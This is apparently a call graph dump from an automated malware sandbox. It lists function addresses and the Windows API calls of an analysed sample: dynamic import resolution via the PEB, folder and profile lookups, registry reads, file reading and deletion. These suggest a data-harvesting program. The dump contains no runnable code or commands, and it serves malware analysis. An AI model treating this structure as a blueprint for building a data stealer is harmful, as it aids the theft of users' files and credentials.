14405->14411 14410 4031e5 4 API calls 14406->14410 14407->14404 14408->14405 14409->14284 14410->14409 14411->14409 14413 4031e5 4 API calls 14412->14413 14414 408b3e FreeLibrary 14413->14414 14414->14329 14416 402b7c 2 API calls 14415->14416 14417 404512 14416->14417 14419 404585 GetLastError 14417->14419 14420 402bab 2 API calls 14417->14420 14423 402b7c 2 API calls 14417->14423 14424 40457c 14417->14424 14459 4044a7 14417->14459 14421 404592 14419->14421 14419->14424 14420->14417 14422 402bab 2 API calls 14421->14422 14422->14424 14423->14417 14424->14371 14426 40a202 14425->14426 14427 40a1c3 14425->14427 14462 405f08 14426->14462 14429 405b6f 6 API calls 14427->14429 14431 40a1d0 14429->14431 14430 40a1fc 14430->14371 14431->14430 14434 40a1f3 14431->14434 14469 40a45b 14431->14469 14433 40a333 14435 402bab 2 API calls 14433->14435 14437 402bab 2 API calls 14434->14437 14435->14430 14437->14430 14438 405b6f 6 API calls 14440 40a245 14438->14440 14439 40a25d 14441 405b6f 6 API calls 14439->14441 14440->14439 14442 413a58 14 API calls 14440->14442 14447 40a26b 14441->14447 14443 40a257 14442->14443 14446 402bab 2 API calls 14443->14446 14444 40a28b 14445 405b6f 6 API calls 14444->14445 14452 40a297 14445->14452 14446->14439 14447->14444 14448 40a284 14447->14448 14581 40955b 14447->14581 14450 402bab 2 API calls 14448->14450 14450->14444 14451 405b6f 6 API calls 14456 40a2b7 14451->14456 14453 40a2b0 14452->14453 14452->14456 14588 40968e 14452->14588 14454 402bab 2 API calls 14453->14454 14454->14456 14456->14433 14456->14451 14458 402bab 2 API calls 14456->14458 14598 4098a7 14456->14598 14458->14456 14460 4031e5 4 API calls 14459->14460 14461 4044b9 GetPrivateProfileStringW 14460->14461 14461->14417 14463 4031e5 4 API calls 14462->14463 14464 405f1d 14463->14464 14465 405f55 14464->14465 14466 402b7c 2 API calls 14464->14466 14465->14430 14465->14433 14465->14438 14465->14439 14467 405f36 14466->14467 14467->14465 14468 4031e5 4 API calls 14467->14468 14468->14465 14607 40642c 14469->14607 14471 40a469 14472 40c4ff 14471->14472 14610 4047e6 14471->14610 14472->14434 14475 4040bb 13 API calls 14476 40bf88 14475->14476 14476->14472 14477 403c90 9 API calls 14476->14477 14478 40bfaa 14477->14478 14479 402b7c 2 API calls 14478->14479 14483 40bfc1 14479->14483 14480 40c4f3 14481 403f9e 5 API calls 14480->14481 14481->14472 14482 40c3aa 14482->14480 14484 4056bf 2 API calls 14482->14484 14491 40c4e3 14482->14491 14483->14482 14617 40a423 14483->14617 14487 40c3d2 14484->14487 14485 402bab 2 API calls 14485->14480 14490 4040bb 13 API calls 14487->14490 14487->14491 14489 405f08 4 API calls 14493 40c005 14489->14493 14494 40c3f3 14490->14494 14491->14485 14492 40c021 14496 4031e5 4 API calls 14492->14496 14493->14492 14620 40a43f 14493->14620 14497 40c4d1 14494->14497 14677 405a52 14494->14677 14500 40c034 14496->14500 14499 413aca 4 API calls 14497->14499 14503 40c4dd 14499->14503 14507 4031e5 4 API calls 14500->14507 14502 402bab 2 API calls 14502->14492 14505 405695 2 API calls 14503->14505 14504 40c411 14682 405a87 14504->14682 14505->14491 14513 40c04d 14507->14513 14508 40c4b3 14509 402bab 2 API calls 14508->14509 14511 40c4cb 14509->14511 14510 405a52 4 API calls 14521 40c423 14510->14521 14512 403f9e 5 API calls 14511->14512 14512->14497 14515 4031e5 4 API calls 14513->14515 14514 405a87 4 API calls 14514->14521 14516 40c085 14515->14516 14518 4031e5 4 API calls 14516->14518 14517 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 14517->14521 14519 40c09c 14518->14519 14522 4031e5 4 API calls 14519->14522 14520 402bab 2 API calls 14520->14521 14521->14508 14521->14510 14521->14514 14521->14517 14521->14520 14523 40c0b3 14522->14523 14524 4031e5 4 API calls 14523->14524 14525 40c0ca 14524->14525 14526 4031e5 4 API calls 14525->14526 14527 40c0e7 14526->14527 14528 4031e5 4 API calls 14527->14528 14529 40c100 14528->14529 14530 4031e5 4 API calls 14529->14530 14531 40c119 14530->14531 14532 4031e5 4 API calls 14531->14532 14533 40c132 14532->14533 14534 4031e5 4 API calls 14533->14534 14535 40c14b 14534->14535 14536 4031e5 4 API calls 14535->14536 14537 40c164 14536->14537 14538 4031e5 4 API calls 14537->14538 14539 40c17d 14538->14539 14540 4031e5 4 API calls 14539->14540 14541 40c196 14540->14541 14542 4031e5 4 API calls 14541->14542 14543 40c1af 14542->14543 14544 4031e5 4 API calls 14543->14544 14545 40c1c8 14544->14545 14546 4031e5 4 API calls 14545->14546 14547 40c1de 14546->14547 14548 4031e5 4 API calls 14547->14548 14549 40c1f4 14548->14549 14550 4031e5 4 API calls 14549->14550 14551 40c20d 14550->14551 14552 4031e5 4 API calls 14551->14552 14553 40c226 14552->14553 14554 4031e5 4 API calls 14553->14554 14555 40c23f 14554->14555 14556 4031e5 4 API calls 14555->14556 14557 40c258 14556->14557 14558 4031e5 4 API calls 14557->14558 14559 40c273 14558->14559 14560 4031e5 4 API calls 14559->14560 14561 40c28a 14560->14561 14562 4031e5 4 API calls 14561->14562 14564 40c2d5 14562->14564 14563 40c3a2 14565 402bab 2 API calls 14563->14565 14564->14563 14566 4031e5 4 API calls 14564->14566 14565->14482 14567 40c315 14566->14567 14568 40c38b 14567->14568 14623 404866 14567->14623 14569 403c40 5 API calls 14568->14569 14571 40c397 14569->14571 14573 403c40 5 API calls 14571->14573 14573->14563 14574 40c382 14575 403c40 5 API calls 14574->14575 14575->14568 14578 406c4c 6 API calls 14579 40c355 14578->14579 14579->14574 14647 4126a7 14579->14647 14584 40956d 14581->14584 14587 409673 14581->14587 14582 408b45 6 API calls 14582->14584 14583 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 14583->14584 14584->14582 14584->14583 14585 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 14584->14585 14586 402bab GetProcessHeap HeapFree 14584->14586 14584->14587 14585->14584 14586->14584 14587->14448 14589 4040bb 13 API calls 14588->14589 14597 4096a9 14589->14597 14590 40989f 14590->14453 14591 409896 14592 403f9e 5 API calls 14591->14592 14592->14590 14594 408b45 6 API calls 14594->14597 14595 402bab GetProcessHeap HeapFree 14595->14597 14596 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 14596->14597 14597->14590 14597->14591 14597->14594 14597->14595 14597->14596 14846 4059d8 14597->14846 14599 4040bb 13 API calls 14598->14599 14605 4098c1 14599->14605 14600 4099fb 14600->14456 14601 4099f3 14602 403f9e 5 API calls 14601->14602 14602->14600 14603 4059d8 4 API calls 14603->14605 14604 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 14604->14605 14605->14600 14605->14601 14605->14603 14605->14604 14606 402bab GetProcessHeap HeapFree 14605->14606 14606->14605 14608 4031e5 4 API calls 14607->14608 14609 406441 GetNativeSystemInfo 14608->14609 14609->14471 14611 4031e5 4 API calls 14610->14611 14613 40480a 14611->14613 14612 4031e5 4 API calls 14612->14613 14613->14612 14615 40484f 14613->14615 14616 40485d 14613->14616 14614 403c40 5 API calls 14614->14616 14615->14614 14616->14472 14616->14475 14618 4031e5 4 API calls 14617->14618 14619 40a435 14618->14619 14619->14489 14621 4031e5 4 API calls 14620->14621 14622 40a451 14621->14622 14622->14502 14624 4031e5 4 API calls 14623->14624 14625 40487c 14624->14625 14625->14574 14626 406c4c 14625->14626 14687 4068eb 14626->14687 14628 406cab 14699 40469b 14628->14699 14629 406c6c 14629->14628 14638 406e02 14629->14638 14696 406894 14629->14696 14636 406cef 14639 4031e5 4 API calls 14636->14639 14645 406df1 14636->14645 14637 40469b 4 API calls 14637->14638 14638->14578 14640 406d26 14639->14640 14641 40771e 6 API calls 14640->14641 14640->14645 14646 406d57 14641->14646 14642 406da2 14643 4031e5 4 API calls 14642->14643 14643->14645 14645->14637 14646->14642 14712 4068b0 14646->14712 14648 4126bb 14647->14648 14649 4126d1 14647->14649 14650 412840 14648->14650 14768 40488c 14648->14768 14649->14650 14774 407055 14649->14774 14650->14574 14654 412837 14655 403c40 5 API calls 14654->14655 14655->14650 14658 41281e 14659 4070ff 6 API calls 14658->14659 14659->14654 14660 407055 6 API calls 14661 412742 14660->14661 14661->14658 14662 40719a 6 API calls 14661->14662 14663 41276e 14662->14663 14664 412804 14663->14664 14790 406f4a 14663->14790 14818 4070ff 14664->14818 14667 41279a 14796 412553 14667->14796 14840 405907 14677->14840 14679 405a61 14680 405a76 14679->14680 14681 405907 4 API calls 14679->14681 14680->14504 14681->14679 14683 402b7c 2 API calls 14682->14683 14685 405a99 14683->14685 14686 405ade 14685->14686 14843 40595e 14685->14843 14686->14521 14715 4076a8 14687->14715 14689 406913 14690 406a61 14689->14690 14691 40771e 6 API calls 14689->14691 14690->14629 14694 406949 14691->14694 14693 404678 4 API calls 14693->14694 14694->14690 14694->14693 14695 40771e 6 API calls 14694->14695 14721 4046c2 14694->14721 14695->14694 14697 4031e5 4 API calls 14696->14697 14698 4068a6 14697->14698 14698->14629 14700 4046b4 14699->14700 14701 4046a4 14699->14701 14700->14638 14703 404678 14700->14703 14702 4031e5 4 API calls 14701->14702 14702->14700 14704 4031e5 4 API calls 14703->14704 14705 40468b 14704->14705 14705->14638 14706 40771e 14705->14706 14707 407737 14706->14707 14711 407748 14706->14711 14708 407644 6 API calls 14707->14708 14709 407741 14708->14709 14710 406baa 6 API calls 14709->14710 14710->14711 14711->14636 14713 4031e5 4 API calls 14712->14713 14714 4068c2 14713->14714 14714->14646 14716 4076c1 14715->14716 14719 4076d2 14715->14719 14729 407644 14716->14729 14719->14689 14722 4046d3 14721->14722 14723 4046d9 14721->14723 14764 40464c 14722->14764 14724 4046e9 14723->14724 14726 404678 4 API calls 14723->14726 14727 404714 14724->14727 14728 40469b 4 API calls 14724->14728 14726->14724 14727->14694 14728->14727 14730 407653 14729->14730 14731 407661 14729->14731 14730->14731 14737 406a6b 14730->14737 14733 406baa 14731->14733 14734 406bbb 14733->14734 14735 406bc8 14733->14735 14734->14735 14745 407402 14734->14745 14735->14719 14739 406a81 14737->14739 14738 402b7c 2 API calls 14738->14739 14739->14738 14740 406894 4 API calls 14739->14740 14741 406b96 14739->14741 14743 402bab 2 API calls 14739->14743 14744 406b8b 14739->14744 14740->14739 14742 402bab 2 API calls 14741->14742 14742->14744 14743->14739 14744->14731 14746 407644 6 API calls 14745->14746 14748 407412 14746->14748 14747 407450 14747->14735 14748->14747 14749 402b7c 2 API calls 14748->14749 14750 407483 14749->14750 14750->14747 14751 402b7c 2 API calls 14750->14751 14753 4074ce 14751->14753 14752 4074da 14754 4068cc 2 API calls 14752->14754 14753->14752 14755 402b7c 2 API calls 14753->14755 14754->14747 14758 40751f 14755->14758 14756 40752b 14757 4068cc 2 API calls 14756->14757 14757->14752 14758->14756 14760 4068cc 14758->14760 14761 4068d6 14760->14761 14762 4068e3 14760->14762 14761->14762 14763 402bab GetProcessHeap HeapFree 14761->14763 14762->14756 14763->14762 14765 404666 14764->14765 14766 404659 14764->14766 14765->14723 14767 4031e5 4 API calls 14766->14767 14767->14765 14769 4047e6 5 API calls 14768->14769 14770 404897 14769->14770 14771 40489c 14770->14771 14826 4047c7 14770->14826 14771->14649 14775 40706f 14774->14775 14780 407084 14774->14780 14776 407644 6 API calls 14775->14776 14775->14780 14777 40707d 14776->14777 14778 406baa 6 API calls 14777->14778 14778->14780 14781 4070e4 14780->14781 14829 406fd2 14780->14829 14781->14654 14782 40719a 14781->14782 14783 4071b0 14782->14783 14786 4071c5 14782->14786 14784 407644 6 API calls 14783->14784 14783->14786 14785 4071be 14784->14785 14787 406baa 6 API calls 14785->14787 14788 406fd2 4 API calls 14786->14788 14789 407226 14786->14789 14787->14786 14788->14789 14789->14658 14789->14660 14791 406f64 14790->14791 14795 406f75 14790->14795 14792 407644 6 API calls 14791->14792 14793 406f6e 14792->14793 14794 406baa 6 API calls 14793->14794 14794->14795 14795->14667 14837 4060ac 14796->14837 14819 407116 14818->14819 14821 40712b 14818->14821 14820 407644 6 API calls 14819->14820 14819->14821 14822 407124 14820->14822 14824 406fd2 4 API calls 14821->14824 14825 407187 14821->14825 14823 406baa 6 API calls 14822->14823 14823->14821 14824->14825 14825->14658 14827 4031e5 4 API calls 14826->14827 14828 4047d9 14827->14828 14828->14649 14830 406fde 14829->14830 14831 407027 14830->14831 14832 4031e5 4 API calls 14830->14832 14831->14781 14833 406ffa 14832->14833 14834 4031e5 4 API calls 14833->14834 14835 407011 14834->14835 14836 4031e5 4 API calls 14835->14836 14836->14831 14838 4031e5 4 API calls 14837->14838 14839 4060bb 14838->14839 14839->14839 14841 4031e5 4 API calls 14840->14841 14842 40591a 14841->14842 14842->14679 14844 4031e5 4 API calls 14843->14844 14845 405971 14844->14845 14845->14685 14847 4031e5 4 API calls 14846->14847 14848 4059ed 14847->14848 14849 405a38 14848->14849 14850 402b7c 2 API calls 14848->14850 14849->14597 14851 405a16 14850->14851 14851->14849 14852 4031e5 4 API calls 14851->14852 14852->14849 14931 408952 14952 40823f 14931->14952 14934 408960 14936 4056bf 2 API calls 14934->14936 14937 40896a 14936->14937 14980 408862 14937->14980 14939 4089c4 14940 413aca 4 API calls 14939->14940 14941 4089d4 14940->14941 14943 405695 2 API calls 14941->14943 14942 408975 14942->14939 14988 4087d6 14942->14988 14945 4089df 14943->14945 14950 40899d 14950->14939 14951 402bab 2 API calls 14950->14951 14951->14950 14953 40824d 14952->14953 14954 4031e5 4 API calls 14953->14954 14967 40831b 14953->14967 14955 40826d 14954->14955 14956 4031e5 4 API calls 14955->14956 14957 408289 14956->14957 14958 4031e5 4 API calls 14957->14958 14959 4082a5 14958->14959 14960 4031e5 4 API calls 14959->14960 14961 4082c1 14960->14961 14962 4031e5 4 API calls 14961->14962 14963 4082e2 14962->14963 14964 4031e5 4 API calls 14963->14964 14965 4082ff 14964->14965 14966 4031e5 4 API calls 14965->14966 14966->14967 14967->14934 14968 4083bb 14967->14968 15016 408363 14968->15016 14971 4084ab 14971->14934 14972 4056bf 2 API calls 14973 4083f4 14972->14973 14974 408492 14973->14974 15019 40815d 14973->15019 15034 40805d 14973->15034 14975 413aca 4 API calls 14974->14975 14976 4084a0 14975->14976 14977 405695 2 API calls 14976->14977 14977->14971 15049 404b8f 14980->15049 14982 408946 14982->14942 14983 4031e5 4 API calls 14984 40887e 14983->14984 14984->14982 14984->14983 14985 40893e 14984->14985 14987 402b7c 2 API calls 14984->14987 15052 404a39 14985->15052 14987->14984 14989 402b7c 2 API calls 14988->14989 14990 4087e7 14989->14990 14991 4031e5 4 API calls 14990->14991 14994 40885a 14990->14994 14995 408802 14991->14995 14992 402bab 2 API calls 14992->14994 15000 408749 14994->15000 14996 40884d 14995->14996 14999 408853 14995->14999 15061 408522 14995->15061 15065 4084b4 14995->15065 15068 4084d4 14996->15068 14999->14992 15001 404b8f 5 API calls 15000->15001 15005 408765 15001->15005 15002 4031e5 4 API calls 15002->15005 15003 408522 4 API calls 15003->15005 15004 4087c7 15006 404a39 5 API calls 15004->15006 15005->15002 15005->15003 15005->15004 15007 4087cf 15005->15007 15006->15007 15008 4085d1 15007->15008 15009 4086c2 15008->15009 15014 4085e9 15008->15014 15009->14950 15011 402bab 2 API calls 15011->15014 15012 4031e5 4 API calls 15012->15014 15014->15009 15014->15011 15014->15012 15074 4089e6 15014->15074 15093 4086c9 15014->15093 15097 4036a3 15014->15097 15017 4031e5 4 API calls 15016->15017 15018 408386 15017->15018 15018->14971 15018->14972 15020 40816f 15019->15020 15021 4081b6 15020->15021 15022 4081fd 15020->15022 15033 4081ef 15020->15033 15024 405872 4 API calls 15021->15024 15023 405872 4 API calls 15022->15023 15025 408213 15023->15025 15026 4081cf 15024->15026 15028 405872 4 API calls 15025->15028 15027 405872 4 API calls 15026->15027 15029 4081df 15027->15029 15030 408222 15028->15030 15031 405872 4 API calls 15029->15031 15032 405872 4 API calls 15030->15032 15031->15033 15032->15033 15033->14973 15035 40808c 15034->15035 15036 4080d2 15035->15036 15037 408119 15035->15037 15048 40810b 15035->15048 15038 405872 4 API calls 15036->15038 15039 405872 4 API calls 15037->15039 15040 4080eb 15038->15040 15041 40812f 15039->15041 15042 405872 4 API calls 15040->15042 15043 405872 4 API calls 15041->15043 15044 4080fb 15042->15044 15045 40813e 15043->15045 15047 405872 4 API calls 15044->15047 15046 405872 4 API calls 15045->15046 15046->15048 15047->15048 15048->14973 15055 404a19 15049->15055 15051 404ba0 15051->14984 15058 4049ff 15052->15058 15054 404a44 15054->14982 15056 4031e5 4 API calls 15055->15056 15057 404a2c RegOpenKeyW 15056->15057 15057->15051 15059 4031e5 4 API calls 15058->15059 15060 404a12 RegCloseKey 15059->15060 15060->15054 15062 408534 15061->15062 15064 4085af 15062->15064 15071 4084ee 15062->15071 15064->14995 15066 4031e5 4 API calls 15065->15066 15067 4084c7 15066->15067 15067->14995 15069 4031e5 4 API calls 15068->15069 15070 4084e7 15069->15070 15070->14999 15072 4031e5 4 API calls 15071->15072 15073 408501 15072->15073 15073->15064 15075 4031e5 4 API calls 15074->15075 15076 408a06 15075->15076 15077 408b21 15076->15077 15078 4031e5 4 API calls 15076->15078 15077->15014 15081 408a32 15078->15081 15079 408b17 15109 403649 15079->15109 15081->15079 15100 403666 15081->15100 15084 408b0e 15106 40362f 15084->15106 15085 4031e5 4 API calls 15087 408a88 15085->15087 15087->15084 15088 4031e5 4 API calls 15087->15088 15089 408ac4 15088->15089 15090 405b6f 6 API calls 15089->15090 15091 408aff 15090->15091 15091->15084 15103 408508 15091->15103 15094 408744 15093->15094 15096 4086e2 15093->15096 15094->15014 15095 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 15095->15096 15096->15094 15096->15095 15098 4031e5 4 API calls 15097->15098 15099 4036b5 15098->15099 15099->15014 15101 4031e5 4 API calls 15100->15101 15102 403679 15101->15102 15102->15084 15102->15085 15104 4031e5 4 API calls 15103->15104 15105 40851b 15104->15105 15105->15084 15107 4031e5 4 API calls 15106->15107 15108 403642 15107->15108 15108->15079 15110 4031e5 4 API calls 15109->15110 15111 40365c 15110->15111 15111->15077 15176 40f561 15179 40f4b6 15176->15179 15180 413b28 7 API calls 15179->15180 15181 40f4bf 15180->15181 15182 405b6f 6 API calls 15181->15182 15183 413a58 14 API calls 15181->15183 15184 402bab GetProcessHeap HeapFree 15181->15184 15185 40f559 15181->15185 15182->15181 15183->15181 15184->15181 15186 403b64 15187 4031e5 4 API calls 15186->15187 15188 403b77 PathFileExistsW 15187->15188 15212 40f16e 15213 4056bf 2 API calls 15212->15213 15214 40f17b 15213->15214 15215 412093 13 API calls 15214->15215 15216 40f19e 15215->15216 15217 412093 13 API calls 15216->15217 15218 40f1b6 15217->15218 15219 412093 13 API calls 15218->15219 15220 40f1cc 15219->15220 15221 412093 13 API calls 15220->15221 15222 40f1e2 15221->15222 15223 413aca 4 API calls 15222->15223 15224 40f1ef 15223->15224 15225 405695 2 API calls 15224->15225 15226 40f1fa 15225->15226 15227 40ce71 15228 413b28 7 API calls 15227->15228 15229 40ce78 15228->15229 15230 405b6f 6 API calls 15229->15230 15234 40ce83 15230->15234 15231 40cec1 15232 403fbf 7 API calls 15231->15232 15233 40cecc 15232->15233 15236 403d74 11 API calls 15233->15236 15245 40cefb 15233->15245 15234->15231 15237 403d74 11 API calls 15234->15237 15243 40ceba 15234->15243 15235 402bab 2 API calls 15235->15231 15238 40cee7 15236->15238 15239 40cead 15237->15239 15240 402bab 2 API calls 15238->15240 15244 40cef4 15238->15244 15242 402bab 2 API calls 15239->15242 15239->15243 15240->15244 15241 402bab 2 API calls 15241->15245 15242->15243 15243->15235 15244->15241 15246 406472 15247 4031e5 4 API calls 15246->15247 15248 406484 Sleep 15247->15248 15306 403c08 15307 4031e5 4 API calls 15306->15307 15308 403c1a DeleteFileW 15307->15308 15309 410a09 15310 41219c 15 API calls 15309->15310 15311 410a1b 15310->15311 15312 41219c 15 API calls 15311->15312 15313 410a23 15312->15313 15314 41219c 15 API calls 15313->15314 15315 410a2c 15314->15315 15316 41219c 15 API calls 15315->15316 15317 410a38 15316->15317 15318 404b22 7 API calls 15317->15318 15319 410a4c 15318->15319 15320 403fbf 7 API calls 15319->15320 15325 410a7a 15319->15325 15321 410a5c 15320->15321 15322 413a58 14 API calls 15321->15322 15327 410a71 15321->15327 15324 410a6b 15322->15324 15323 402bab 2 API calls 15323->15325 15326 402bab 2 API calls 15324->15326 15326->15327 15327->15323 15331 40c509 15332 412093 13 API calls 15331->15332 15333 40c51e 15332->15333 15337 40910d 15338 404b22 7 API calls 15337->15338 15339 409124 15338->15339 15340 405b6f 6 API calls 15339->15340 15344 40917a 15339->15344 15341 40913e 15340->15341 15343 404b22 7 API calls 15341->15343 15349 409173 15341->15349 15342 402bab 2 API calls 15342->15344 15345 409153 15343->15345 15346 40916a 15345->15346 15348 409408 18 API calls 15345->15348 15347 402bab 2 API calls 15346->15347 15347->15349 15350 409164 15348->15350 15349->15342 15351 402bab 2 API calls 15350->15351 15351->15346 15355 410410 15356 4056bf 2 API calls 15355->15356 15357 41041b 15356->15357 15358 412093 13 API calls 15357->15358 15359 41043c 15358->15359 15360 413aca 4 API calls 15359->15360 15361 410449 15360->15361 15362 405695 2 API calls 15361->15362 15363 410454 15362->15363 15390 40c71a 15391 41219c 15 API calls 15390->15391 15392 40c728 15391->15392 15405 402c1f 15406 4031e5 4 API calls 15405->15406 15407 402c31 LoadLibraryW 15406->15407 15475 40f12f 15476 41219c 15 API calls 15475->15476 15477 40f13f 15476->15477 15478 41219c 15 API calls 15477->15478 15479 40f14c 15478->15479 15480 41219c 15 API calls 15479->15480 15481 40f159 15480->15481 15482 41219c 15 API calls 15481->15482 15483 40f166 15482->15483 15490 40ed35 15491 4056bf 2 API calls 15490->15491 15492 40ed42 15491->15492 15493 412093 13 API calls 15492->15493 15494 40ed63 15493->15494 15495 412093 13 API calls 15494->15495 15496 40ed73 15495->15496 15497 413aca 4 API calls 15496->15497 15498 40ed80 15497->15498 15499 405695 2 API calls 15498->15499 15500 40ed8e 15499->15500 14029 40f3c5 14034 41219c 14029->14034 14032 41219c 15 API calls 14033 40f3e1 14032->14033 14035 4121b1 14034->14035 14051 40f3d3 14034->14051 14036 4121be 14035->14036 14040 4121c5 14035->14040 14083 413ba4 14036->14083 14038 4121ca 14052 404056 14038->14052 14040->14038 14044 412210 14040->14044 14041 4121c3 14041->14051 14060 405b6f 14041->14060 14044->14051 14088 403fbf 14044->14088 14045 41224d 14048 402bab 2 API calls 14045->14048 14045->14051 14048->14051 14051->14032 14099 402b7c GetProcessHeap RtlAllocateHeap 14052->14099 14054 404066 14055 404095 14054->14055 14101 4031e5 14054->14101 14055->14041 14058 404099 14059 402bab 2 API calls 14058->14059 14059->14055 14061 405b7d 14060->14061 14062 402b7c 2 API calls 14061->14062 14063 405b99 14062->14063 14069 405c02 14063->14069 14137 4059b8 14063->14137 14065 405c09 14068 402bab 2 API calls 14065->14068 14066 405bba 14066->14065 14067 402b7c 2 API calls 14066->14067 14070 405bdd 14067->14070 14068->14069 14069->14045 14073 413a58 14069->14073 14070->14065 14071 405be4 14070->14071 14072 402bab 2 API calls 14071->14072 14072->14069 14074 413a63 14073->14074 14082 412245 14073->14082 14074->14082 14140 405781 14074->14140 14077 405781 4 API calls 14078 413aa0 14077->14078 14143 4057df 14078->14143 14081 405781 4 API calls 14081->14082 14096 402bab 14082->14096 14086 413bad 14083->14086 14084 404056 7 API calls 14085 413bc5 14084->14085 14085->14041 14086->14084 14087 413bb8 14086->14087 14087->14041 14089 402b7c 2 API calls 14088->14089 14091 403fcf 14089->14091 14090 403ff4 14090->14041 14091->14090 14262 403b98 14091->14262 14094 403ff8 GetLastError 14095 402bab 2 API calls 14094->14095 14095->14090 14097 402bb4 GetProcessHeap HeapFree 14096->14097 14098 402bc6 14096->14098 14097->14098 14098->14045 14100 402b98 14099->14100 14100->14054 14102 4031f3 14101->14102 14103 403236 14101->14103 14102->14103 14106 403208 14102->14106 14112 4030a5 14103->14112 14105 403224 14107 403258 SHGetFolderPathW 14105->14107 14109 4031e5 4 API calls 14105->14109 14118 403263 14106->14118 14107->14055 14107->14058 14109->14107 14110 40320d 14110->14107 14111 4030a5 4 API calls 14110->14111 14111->14105 14124 402ca4 14112->14124 14114 4030b0 14115 4030b5 14114->14115 14128 4030c4 14114->14128 14115->14105 14119 40326d 14118->14119 14120 402b7c 2 API calls 14119->14120 14123 4032b7 14119->14123 14121 40328c 14120->14121 14122 402b7c 2 API calls 14121->14122 14122->14123 14123->14110 14125 403079 14124->14125 14126 40307c 14125->14126 14132 40317b GetPEB 14125->14132 14126->14114 14129 4030eb 14128->14129 14130 4030c0 14129->14130 14134 402c03 14129->14134 14130->14105 14133 40319b 14132->14133 14133->14126 14135 4031e5 3 API calls 14134->14135 14136 402c15 GetProcAddress 14135->14136 14136->14130 14138 4031e5 4 API calls 14137->14138 14139 4059cb 14138->14139 14139->14066 14158 405797 14140->14158 14142 405792 14142->14077 14144 4057eb 14143->14144 14157 405832 14143->14157 14144->14157 14168 4040bb 14144->14168 14147 40582c 14192 403f9e 14147->14192 14148 405853 14206 405762 14148->14206 14149 405839 14149->14148 14195 405627 14149->14195 14156 403f9e 5 API calls 14156->14157 14157->14081 14157->14082 14159 4057a1 14158->14159 14161 4057bd 14158->14161 14159->14161 14162 4056fc 14159->14162 14161->14142 14163 405714 14162->14163 14164 402b7c 2 API calls 14163->14164 14166 405730 14164->14166 14165 405752 14165->14161 14166->14165 14167 402bab 2 API calls 14166->14167 14167->14165 14169 4031e5 4 API calls 14168->14169 14170 4040d5 CreateFileW 14169->14170 14171 4040f8 14170->14171 14172 40418d 14170->14172 14173 4031e5 4 API calls 14171->14173 14184 404183 14172->14184 14212 403c90 14172->14212 14179 404105 14173->14179 14177 40416d 14209 403c40 14177->14209 14179->14177 14185 4031e5 4 API calls 14179->14185 14180 4041c8 14183 402bab 2 API calls 14180->14183 14182 4040bb 10 API calls 14182->14180 14183->14184 14184->14147 14184->14149 14184->14157 14186 404131 VirtualAlloc 14185->14186 14186->14177 14187 404142 14186->14187 14188 4031e5 4 API calls 14187->14188 14189 40414f ReadFile 14188->14189 14189->14177 14190 404160 14189->14190 14191 4031e5 4 API calls 14190->14191 14191->14177 14193 4031e5 4 API calls 14192->14193 14194 403fb1 VirtualFree 14193->14194 14194->14157 14196 4031e5 4 API calls 14195->14196 14197 40563a 14196->14197 14198 405872 14197->14198 14200 405881 14198->14200 14199 4058bc 14201 405797 4 API calls 14199->14201 14204 4058af 14199->14204 14200->14199 14259 4058d4 14200->14259 14201->14204 14204->14148 14205 405781 4 API calls 14205->14199 14207 405781 4 API calls 14206->14207 14208 405770 14207->14208 14208->14156 14210 4031e5 4 API calls 14209->14210 14211 403c52 CloseHandle 14210->14211 14211->14184 14213 403ca3 14212->14213 14214 403caa 14212->14214 14239 405dc5 14213->14239 14216 404056 7 API calls 14214->14216 14219 403d3a 14214->14219 14217 403cbe 14216->14217 14218 403d2e 14217->14218 14220 403d17 14217->14220 14221 403ccf 14217->14221 14218->14219 14224 402bab 2 API calls 14218->14224 14219->14184 14235 403c59 14219->14235 14222 405b6f 6 API calls 14220->14222 14223 405b6f 6 API calls 14221->14223 14225 403d14 14222->14225 14226 403cdd 14223->14226 14224->14219 14228 402bab 2 API calls 14225->14228 14227 405b6f 6 API calls 14226->14227 14229 403cee 14227->14229 14228->14218 14229->14225 14244 403d4d 14229->14244 14232 403d0b 14234 402bab 2 API calls 14232->14234 14234->14225 14236 403c21 14235->14236 14237 4031e5 4 API calls 14236->14237 14238 403c33 14237->14238 14238->14180 14238->14182 14253 406799 14239->14253 14241 405dd5 14242 402b7c 2 API calls 14241->14242 14243 405dfe 14242->14243 14243->14214 14256 403bb7 14244->14256 14246 403cfe 14246->14232 14247 403c62 14246->14247 14248 403d4d 5 API calls 14247->14248 14249 403c6d 14248->14249 14250 403c72 14249->14250 14251 4031e5 4 API calls 14249->14251 14250->14232 14252 403c87 CreateDirectoryW 14251->14252 14252->14232 14254 4031e5 4 API calls 14253->14254 14255 4067ad 14254->14255 14255->14241 14257 4031e5 4 API calls 14256->14257 14258 403bc9 GetFileAttributesW 14257->14258 14258->14246 14260 405797 4 API calls 14259->14260 14261 4058a8 14260->14261 14261->14204 14261->14205 14263 4031e5 4 API calls 14262->14263 14264 403baa 14263->14264 14264->14090 14264->14094 17654 40ebc6 17655 4040bb 13 API calls 17654->17655 17656 40ebdf 17655->17656 17662 40ecd7 17656->17662 17674 407795 17656->17674 17659 40eccd 17661 403f9e 5 API calls 17659->17661 17660 4056bf 2 API calls 17673 40ec12 17660->17673 17661->17662 17663 40ecb5 17664 402bab 2 API calls 17663->17664 17665 40ecbd 17664->17665 17666 413aca 4 API calls 17665->17666 17667 40ecc7 17666->17667 17669 405695 2 API calls 17667->17669 17668 407908 GetProcessHeap RtlAllocateHeap 17668->17673 17669->17659 17670 412269 6 API calls 17670->17673 17671 402bab GetProcessHeap HeapFree 17671->17673 17672 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 17672->17673 17673->17663 17673->17668 17673->17670 17673->17671 17673->17672 17676 4077ab 17674->17676 17675 4077b3 17675->17659 17675->17660 17676->17675 17685 405ae9 17676->17685 17678 4077e1 17678->17675 17679 407802 17678->17679 17680 4077f8 17678->17680 17682 402b7c 2 API calls 17679->17682 17681 402bab 2 API calls 17680->17681 17681->17675 17683 407811 17682->17683 17684 402bab 2 API calls 17683->17684 17684->17675 17686 405af7 17685->17686 17687 402b7c 2 API calls 17686->17687 17689 405b03 17687->17689 17688 405b5a 17688->17678 17689->17688 17698 405998 17689->17698 17691 405b21 17692 405b61 